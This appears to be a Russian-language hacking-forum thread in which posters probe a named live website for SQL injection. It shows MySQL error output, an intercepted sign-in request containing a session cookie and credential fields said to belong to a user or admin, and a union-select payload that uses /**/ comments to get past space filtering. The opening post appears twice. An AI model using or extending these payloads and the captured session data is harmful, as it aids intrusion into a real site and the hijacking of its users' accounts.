Привет. Есть уязвимость формата http://domain/'sp%20ace
Ответ:
Код:
Database error: Invalid SQL: select * from elementpath where path='/'sp%20ace'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sp%20ace'' at line 1)
Session halted.
Проблема в том, что %20, + не преобразовываются обратно в пробелы. Можно ли такое обойти? Спасибо
Привет. Есть уязвимость формата http://domain/'sp%20ace
Ответ:
Код:
Database error: Invalid SQL: select * from elementpath where path='/'sp%20ace'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sp%20ace'' at line 1)
Session halted.
Проблема в том, что %20, + не преобразовываются обратно в пробелы. Можно ли такое обойти? Спасибо
тебе в другой раздел, тут вопросы по уязвимостям, а тебе в раздел "О работе"..предлагай цену и может кто и откликнется..
Через софт поимал вроде куки авторизации пользователя (может админ )
Цитата:
Сообщение от None
POST http://en.vsbrothers.com/sign-in.html
Cookie: PHPSESSID=40e01aae3404c21c830ee31f58bfbb71
reg[username]=114082®[password]=40e01aae3404c21c830ee31f58bfbb71
Database error: Invalid SQL: select * from elementpath where path='/'/**/union/**/select/**/1,2,3'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)
Session halted.